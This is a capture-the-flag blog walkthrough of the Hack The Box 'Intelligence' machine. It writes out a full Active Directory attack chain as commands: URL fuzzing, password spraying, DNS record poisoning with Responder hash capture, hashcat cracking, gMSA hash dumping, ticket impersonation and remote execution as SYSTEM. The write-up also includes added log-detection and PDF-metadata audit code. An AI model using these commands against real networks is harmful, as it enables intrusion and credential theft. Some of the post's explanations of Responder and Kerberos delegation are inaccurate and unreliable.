Intelligence — Hackthebox walkthrough

Kavishka Gihan
7 min read · Jul 5, 2021

Intelligence from Hack The Box was a medium-rated box by @Micah. Actually, for me it was quite hard, since I am an absolute beginner when it comes to Active Directory.

User

Just like always, I started with my nmap.

nmap -p- -sC -sV -A --min-rate=400 --min-parallelism=512 -v 10.10.10.248

nmap results

The minute I saw that DNS, LDAP and Kerberos were open, I knew this was going to be an Active Directory box. First of all, I checked out the HTTP server.

domain found

I saw a domain name called ‘dc.intelligence.htb’ in my nmap script scan results. So I added that entry to my /etc/hosts file.

echo "10.10.10.248 dc.intelligence.htb" | sudo tee -a /etc/hosts

I went to see what it looked like.

HTTP server

I really did not know what this paragraph said; I tried translating it, but it was nothing important. After doing my normal enumeration, I found two PDF files that I could download.

two PDF files

So I downloaded those and looked at what they were. It was nothing I could understand. But since these were PDF files, I tried looking at their metadata with exiftool.

exiftool 2020-01-01-upload.pdf

metadata of the PDF file

Here I saw a field called Creator. That is not a common thing to have in a PDF, so I figured it should be some kind of user on the box. With these two files, I got two users: 'William.Lee' and 'Jose.Williams'.

I tried brute forcing SMB and LDAP with these usernames and password lists I thought might help, but no luck. So was all this for nothing?

I tried enumerating DNS and LDAP as well. Those were busts too. Since I was at a dead end, I went back to my nmap results and started all over. When I was going through the HTTP server for the second time, I saw a very interesting thing.

An interesting URL

The PDF files were saved with the date they were uploaded. So I tried to see if there were any other PDF files I could access by changing the date in the URL.

getting a new PDF

And yes, I could. With this I knew I had to do some kind of fuzzing to get all the PDF files. For that I made two files, days and months, containing the days from 1-31 and the months from 1-12.

seq 1 31 > days; seq 1 12 > months

Then I manually added zeros to the start of the numbers from 1-9, as I saw in the URL.

adding zeros to the word lists

As always, since I am something of a Python person, I made a little Python script to fuzz and download all the PDF files for me.

#!/usr/bin/python3
# Author: kavigihan

import os
import requests

BASE = 'http://dc.intelligence.htb/documents'


def fuzz_PDFs():
    # The word lists hold zero-padded numbers, one per line (made with seq above)
    with open('days', 'r') as d:
        days = [line.strip() for line in d if line.strip()]

    with open('months', 'r') as m:
        months = [line.strip() for line in m if line.strip()]

    # Truncate the output file so a previous run does not leave stale URLs behind
    open('urls', 'w').close()

    for month in months:
        for day in days:
            # File names on the server are YYYY-MM-DD, so the month comes first;
            # with the fields the other way round, every day above 12 is missed
            url = f'{BASE}/2020-{month}-{day}-upload.pdf'
            r = requests.get(url)
            if r.status_code == 200:
                print(url)
                with open('urls', 'a') as url_file:
                    url_file.write(url + '\n')


def get_PDFs():
    with open('urls', 'r') as u:
        urls = [line.strip() for line in u if line.strip()]

    for url in urls:
        print(f'[+] Downloading - {url}')
        r = requests.get(url)
        # Save each file under its own name in the current directory
        with open(os.path.basename(url), 'wb') as pdf:
            pdf.write(r.content)


fuzz_PDFs()
get_PDFs()

This is not the best but it works. You can find this script on my GitHub as well.

https://github.com/kavishkagihan/Hackthebox-walkthroughs/blob/main/Intelligence

With this, I was able to fuzz and download all the PDF files on the server.

Fuzzing and downloading the PDF files
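From the defender's side, a sweep like the one above leaves a very recognisable trail: one client producing many 404s for date-shaped file names in a short window. The detection below is an added example, not part of the original post; the log lines are constructed in a simplified IIS-like layout, and the field order, thresholds and IP addresses are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample log: date time method uri status client-ip (not real data)
SAMPLE_LOG = """\
2021-07-05 10:00:01 GET /documents/2020-01-01-upload.pdf 200 10.10.14.5
2021-07-05 10:00:02 GET /documents/2020-01-02-upload.pdf 404 10.10.14.5
2021-07-05 10:00:02 GET /documents/2020-01-03-upload.pdf 404 10.10.14.5
2021-07-05 10:00:03 GET /documents/2020-01-04-upload.pdf 404 10.10.14.5
2021-07-05 10:00:03 GET /documents/2020-01-05-upload.pdf 404 10.10.14.5
2021-07-05 10:00:04 GET /documents/2020-01-06-upload.pdf 404 10.10.14.5
2021-07-05 10:00:04 GET /documents/2020-01-07-upload.pdf 404 10.10.14.5
2021-07-05 10:00:30 GET /documents/2020-01-01-upload.pdf 200 10.10.14.9
2021-07-05 10:00:31 GET /documents/2020-02-31-upload.pdf 404 10.10.14.9
"""

LINE_RE = re.compile(r"^(\S+ \S+) (\w+) (\S+) (\d{3}) (\S+)$")
# Only document names that follow the predictable YYYY-MM-DD-upload.pdf pattern
DATED_DOC_RE = re.compile(r"^/documents/\d{4}-\d{2}-\d{2}-upload\.pdf$")


def parse_line(line):
    """Return (timestamp, uri, status, ip) or None for lines that do not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts, _method, uri, status, ip = m.groups()
    return datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), uri, int(status), ip


def find_sweeps(log_text, window_seconds=60, min_misses=5):
    """Map client IP -> (total 404s, distinct names) for clients that produced
    at least min_misses 404s on date-named documents inside one window."""
    misses = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec[2] == 404 and DATED_DOC_RE.match(rec[1]):
            misses[rec[3]].append((rec[0], rec[1]))
    flagged = {}
    for ip, events in misses.items():
        events.sort()
        start = 0  # sliding window over the sorted timestamps
        for end, (ts, _uri) in enumerate(events):
            while (ts - events[start][0]).total_seconds() > window_seconds:
                start += 1
            if end - start + 1 >= min_misses:
                flagged[ip] = (len(events), len({u for _, u in events}))
                break
    return flagged
```

A single stray 404 (the 10.10.14.9 client) stays below the threshold, while the sweeping client is reported with how many distinct names it probed.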

After this, instead of using exiftool, I ran strings on all these files and extracted all the usernames.

cat *.pdf | strings | grep Creator | cut -d '(' -f 2 | cut -d ')' -f 1 | grep -v TeX > users; cat users

getting usernames from PDF files
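The strings | grep Creator pipeline above is the attacker's view of the same leak; the pre-publication check below is the defender's. It is an added example, not from the original post: it parses the /Creator entry of a PDF Info dictionary (literal strings with escapes, and hex strings) and flags values that look like Firstname.Lastname account names. The PDF fragments are constructed, not the box's files, and the account-name pattern is an assumption.

```python
import re

# Constructed minimal PDF fragments (not the files from the box)
SAMPLE_PDFS = {
    "a.pdf": b"%PDF-1.4\n2 0 obj\n<< /Creator (William.Lee) /Producer (pdfTeX) >>\nendobj\n",
    "b.pdf": b"%PDF-1.4\n3 0 obj\n<< /Creator <4A6F73652E57696C6C69616D73> >>\nendobj\n",
    "c.pdf": b"%PDF-1.4\n4 0 obj\n<< /Creator (TeX \\(Live 2020\\)) >>\nendobj\n",
    "d.pdf": b"%PDF-1.4\n5 0 obj\n<< /Producer (Microsoft Word) >>\nendobj\n",
}

# /Creator followed by a literal string (...) with backslash escapes or a hex string <...>.
# Limitation: nested unescaped parentheses, compressed object streams (PDF 1.5+) and XMP
# metadata are not handled; a strings | grep sweep misses those too, so audit with a real
# PDF library before trusting a "clean" result.
CREATOR_RE = re.compile(rb"/Creator\s*(?:\(((?:\\.|[^\\)])*)\)|<([0-9A-Fa-f\s]*)>)")
ESCAPES = {"n": "\n", "r": "\r", "t": "\t", "b": "\b", "f": "\f"}
ACCOUNT_RE = re.compile(r"^[A-Z][a-z]+\.[A-Z][a-z]+$")  # assumed Firstname.Lastname style


def decode_literal(raw):
    """Resolve PDF literal-string escapes: \\( \\) \\\\ \\n ... and octal \\ddd."""
    out, i = [], 0
    while i < len(raw):
        if raw[i] != "\\":
            out.append(raw[i])
            i += 1
            continue
        octal = re.match(r"[0-7]{1,3}", raw[i + 1:i + 4])
        if octal:
            out.append(chr(int(octal.group(), 8)))
            i += 1 + len(octal.group())
        else:
            nxt = raw[i + 1:i + 2]
            out.append(ESCAPES.get(nxt, nxt))  # \( \) \\ map to themselves
            i += 2
    return "".join(out)


def creators(pdf_bytes):
    """Every decoded /Creator value found in the raw PDF bytes."""
    found = []
    for m in CREATOR_RE.finditer(pdf_bytes):
        if m.group(2) is not None:  # hex string form
            found.append(bytes.fromhex(m.group(2).decode()).decode("latin-1"))
        else:
            found.append(decode_literal(m.group(1).decode("latin-1")))
    return found


def audit(pdfs):
    """Filename -> /Creator values that look like account names and should be scrubbed."""
    return {name: [c for c in creators(data) if ACCOUNT_RE.match(c)]
            for name, data in pdfs.items()}
```

The TeX-style creator decodes correctly but is not flagged, which is the same distinction the grep -v TeX step in the pipeline makes by hand.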

After that, I looked through all the PDF files, and guess what I found.

found a default password

I got a password, 'NewIntelligenceCorpUser9876', from the 2020-06-04-upload.pdf file. Having these pointed me towards SMB. So I used crackmapexec to brute force which username this password belonged to, using the username list I had.

crackmapexec smb 10.10.10.248 -u users -p "NewIntelligenceCorpUser9876"

brute forcing SMB

And I got a valid username for this password.

username — Tiffany.Molina
password — NewIntelligenceCorpUser9876

Root

Since I had credentials, I logged in to SMB as Tiffany.

smbclient -L //10.10.10.248 -U Tiffany.Molina

logging into SMB

So I enumerated the shares I found and saw downdetector.ps1 in the IT share. I downloaded it and tried to understand what it does.

downdetector.ps1 file

What this does is check the DNS records of the domain intelligence.htb for any that start with "web", send an HTTP request to each host found using Ted's credentials (with the -UseDefaultCredentials option), and then send a mail to Ted if the server does not return a 200 OK status code.

What I did was use dnstool.py to add a fake VHOST that doesn't exist, starting with "web", to the zone. This triggers the script and sends a mail to Ted.

python3 dnstool.py -u 'intelligence.htb\Tiffany.Molina' -p NewIntelligenceCorpUser9876 -a add -r webfakedomain.intelligence.htb --data 10.10.114.179 10.10.10.248

adding the fake VHOST

Since this script sends an email to Ted himself, I used Responder to sniff the traffic and get the password hash of the Ted user.

responder -I tun0 -A

NTLMv2 hash of Ted user

What this does is that, when the authentication happens with Kerberos, Responder performs a MITM attack and gets the password hash (just a very simple overview).

I cracked this hash with hashcat and got a password for the Ted user.

hashcat -m 5600 --force hashes\hash.txt wordlists\rockyou.txt

cracking the hash

Since I had control of Ted's account, I mounted the Users share as Ted and started enumerating.

mkdir mount; sudo mount //10.10.10.248/Users mount/ -o username="Ted.Graves",password="Mr.Teddy"

But unfortunately, I couldn't find anything. No config files, no interesting processes running. Nothing!! So I took a step back and looked at what I was missing.

I did almost everything again, then I figured out that I had missed one PDF file, '2020-12-30-upload.pdf'. So I took a look at that.

2020-12-30-upload.pdf

This says that they have not locked down the service accounts yet. I read up on service accounts for a while and found out that we can dump hashes with gMSADumper.py if the service accounts are enabled (correct me if I am wrong).

So I used this method to get the NThash of the svc_int account.

python3 gMSADumper.py -u Ted.Graves -p Mr.Teddy -d intelligence.htb

getting the NThash

With this I knew I could do what they call a "Pass The Ticket" (PTT) attack. For that, I tried to sync my clock with the box using ntpdate.

ntpdate 10.10.10.248

When I was initially doing this, ntpdate didn't work for me. It may work for you, but in my case it didn't.

It would set the time, but within a few seconds the clock jumped back to my time zone's time. So I used a bit of bash and ran it in a loop so that I could keep the time set without it being changed.

while true; do sudo ntpdate 10.10.10.248; done

running the ntpdate command in a loop

While that was running, I used getST.py to get a service ticket impersonating Administrator, so that I could run commands as that user later on.

getST.py intelligence.htb/svc_int$ -spn WWW/dc.intelligence.htb -hashes :d64b83fe606e6d3005e20ce0ee932fe2 -impersonate administrator

PTT attack

What this attack really does is, first, authenticate with our (Ted's) hash. Normally the Kerberos server would then send back a ticket for the user we specified, but here we are saying that in return we want Administrator's ticket, not Ted's (with "-impersonate administrator").

As you can see, the ticket was saved as administrator.ccache. With this ticket you can use various tools to get command execution, but since I knew RPC was there, I used atexec.py.

The atexec.py script from Impacket lets an attacker run commands on the victim host remotely over a DCE/RPC based protocol.

So I exported the ticket I got as an environment variable (the default one is KRB5CCNAME).

export KRB5CCNAME=administrator.ccache

And then I used atexec.py to execute commands, telling it to use the administrator.ccache file (with the -k option).

atexec.py -k -no-pass dc.intelligence.htb 'whoami'

RCE as nt authority

Rooted!!!

"If you have any questions, make sure to leave them down in the comments, or contact me through social media."

Email — iamkavigihan@gmail.com
Instagram — https://www.instagram.com/_kavi.gihan/

Happy Hacking !!! 😄

Cyber Security Student | Machine author @hackthebox | find me on instagram @_kavi.gihan